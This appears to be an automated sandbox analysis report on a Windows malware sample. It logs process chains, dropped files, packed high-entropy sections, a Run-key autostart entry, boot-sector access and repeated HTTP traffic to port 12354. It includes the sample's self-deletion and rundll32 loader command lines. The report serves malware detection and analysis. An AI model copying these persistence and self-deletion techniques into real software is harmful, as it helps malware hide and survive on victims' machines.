Source: C:\Users\user\Desktop\peks66Iy06.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&c:\nfxboms.exe "C:\Users\user\Desktop\peks66Iy06.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\nfxboms.exe c:\nfxboms.exe "C:\Users\user\Desktop\peks66Iy06.exe"
Source: C:\nfxboms.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\ijbbn\gduol.dll",init c:\nfxboms.exe
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\SysWOW64\rundll32.exe" "c:\ijbbn\gduol.dll",init
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ijbbn"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\windows\SysWOW64\rundll32.exe" "c:\ijbbn\gduol.dll",init
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ijbbn"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\peks66Iy06.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 2&c:\nfxboms.exe "C:\Users\user\Desktop\peks66Iy06.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\nfxboms.exe c:\nfxboms.exe "C:\Users\user\Desktop\peks66Iy06.exe"	Jump to behavior
Source: C:\nfxboms.exe	Process created: C:\Windows\SysWOW64\rundll32.exe c:\windows\system32\rundll32.exe "c:\ijbbn\gduol.dll",init c:\nfxboms.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ijbbn"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ijbbn"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Users\user\Desktop\peks66Iy06.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\peks66Iy06.exe	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\nfxboms.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\nfxboms.exe	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: rundll32.exe, 0000000B.00000003.2468998443.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2783300869.0000000005F01000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2243415047.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: INETCA~1.DATntkrnlmp.pdbx6 source: rundll32.exe, 0000000B.00000003.2243415047.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\. source: rundll32.exe, 0000000B.00000003.2498213283.00000000030CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: rundll32.exe, 0000000B.00000003.2468998443.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.* source: rundll32.exe, 0000000B.00000003.1931256177.0000000003141000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1931233952.0000000003133000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930989630.000000000312E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\. source: rundll32.exe, 0000000B.00000003.1705184799.000000000313E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1705006131.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\. source: rundll32.exe, 0000000B.00000003.2243458067.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\. source: rundll32.exe, 0000000B.00000003.1972863803.0000000003142000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2678890956.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\..ore\. source: rundll32.exe, 0000000B.00000003.2243458067.000000000312E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\.\.\.ta\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.* source: rundll32.exe, 0000000B.00000003.2266699679.0000000003104000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2267145364.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.}\.y\. source: rundll32.exe, 0000000B.00000003.2461258215.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\.. source: rundll32.exe, 0000000B.00000003.2243458067.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\. source: rundll32.exe, 0000000B.00000003.1996678440.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1972886857.00000000030CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\.*?s source: rundll32.exe, 0000000B.00000003.2243458067.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tion Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.*Qv source: rundll32.exe, 0000000B.00000003.1524069931.0000000003142000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.* source: rundll32.exe, 0000000B.00000003.2461344495.0000000005E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: LOG.oldLOA~1.PDBwinload_prod.pdb source: rundll32.exe, 0000000B.00000003.3423348893.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.3# source: rundll32.exe, 0000000B.00000003.1705006131.00000000030CC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\..* source: rundll32.exe, 0000000B.00000003.2678890956.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.* source: rundll32.exe, 0000000B.00000003.1955205499.0000000005E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.* source: rundll32.exe, 0000000B.00000003.2120279676.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.41 source: rundll32.exe, 0000000B.00000003.1709224291.0000000005E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\..\.* source: rundll32.exe, 0000000B.00000003.2839087672.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ANALYT~1.JSCntkrnlmp.pdbfx6 source: rundll32.exe, 0000000B.00000003.2783300869.0000000005F01000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\..\..*Yu source: rundll32.exe, 0000000B.00000003.2300135901.0000000003141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\. source: rundll32.exe, 0000000B.00000003.3688624944.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3671902920.0000000005E52000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\..* source: rundll32.exe, 0000000B.00000003.1899075201.0000000003104000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\.* source: rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\..yewy\.pv source: rundll32.exe, 0000000B.00000003.1705184799.000000000313E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1705006131.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\c:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.* source: rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 11_2_100051B0 LoadLibraryA,GetProcAddress,GetExtendedUdpTable,malloc,GetExtendedUdpTable,Sleep,htons,free,FreeLibrary,

11_2_100051B0

Source: initial sample

Static PE information: section where entry point is pointing to: nsp0

Source: peks66Iy06.exe	Static PE information: section name: nsp0
Source: peks66Iy06.exe	Static PE information: section name: nsp1
Source: peks66Iy06.exe	Static PE information: section name: .imports
Source: gduol.dll.10.dr	Static PE information: section name: nsp0
Source: gduol.dll.10.dr	Static PE information: section name: nsp1

Source: C:\Users\user\Desktop\peks66Iy06.exe	Code function: 4_2_004043B0 push eax; ret	4_2_004043DE
Source: C:\nfxboms.exe	Code function: 10_2_004043B0 push eax; ret	10_2_004043DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10010F90 push eax; ret	11_2_10010FBE

Source: peks66Iy06.exe	Static PE information: section name: nsp0 entropy: 6.956476287195321
Source: peks66Iy06.exe	Static PE information: section name: nsp1 entropy: 7.886458519780143
Source: gduol.dll.10.dr	Static PE information: section name: nsp1 entropy: 7.935625569193875

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d

11_2_1000C230

Source: C:\nfxboms.exe	File created: C:\ijbbn\gduol.dll			Jump to dropped file
Source: C:\Users\user\Desktop\peks66Iy06.exe	File created: C:\nfxboms.exe			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

File created: c:\ijbbn\ReadMe.txt

Jump to behavior

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: sprintf,CreateFileA,DeviceIoControl,GetLastError,FormatMessageA,CloseHandle,wsprintfA, \\.\PHYSICALDRIVE%d

11_2_1000C230

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\SysWOW64\rundll32.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgr

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgr			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EvtMgr			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\nfxboms.exe

File deleted: c:\users\user\desktop\peks66iy06.exe

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50247 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50285 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50293 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50296 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50326 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50328 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50339 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50342 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50371 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50390 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50393 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50415 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50422 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50454 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50459 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50464 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50467 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50509 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50545 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50549 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50599 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50603 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50643 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50648 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50713 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50717 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50762 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50770 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50838 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50845 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50838 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50850 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50865 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50872 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50885 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50897 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50923 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50927 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50939 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50945 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50957 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50965 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50966 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50973 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50984 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50987 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 50998 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51005 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51012 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51021 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51029 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51037 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51048 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51071 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51084 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51156 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51164 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51165 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51168 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51177 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51185 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51202 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51225 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51229 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51241 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51258 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51302 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51304 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51307 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51321 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51338 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51353 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51369 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51441 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51461 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51499 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51515 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51530 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51554 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51555 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51572 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51581 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51588 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51685 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51701 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51717 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51724 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51733 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51741 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51748 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51783 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51790 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51797 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51807 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51919 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51931 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 51946 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52745 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52813 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52929 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 52997 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53093 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53303 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53634 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 53844 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54065 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54328 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54492 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54683 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54740 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55003 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55032 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55298 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55606 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55816 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55881 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 55955 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56098 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56117 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56120 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56123 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56129 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56130 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56326 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56486 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56587 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 56954 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 57316 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 58940 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 59328 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60163 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60263 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60344 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60528 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60660 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60698 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60797 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60939 -> 12354
Source: unknown	Network traffic detected: HTTP traffic on port 60992 -> 12354
